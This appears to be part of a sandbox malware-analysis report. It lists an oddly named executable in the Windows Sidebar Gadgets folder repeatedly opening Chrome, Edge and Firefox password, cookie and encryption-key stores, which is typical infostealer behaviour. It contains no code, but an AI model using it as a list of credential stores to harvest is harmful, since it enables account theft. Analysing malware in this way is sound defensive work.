                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
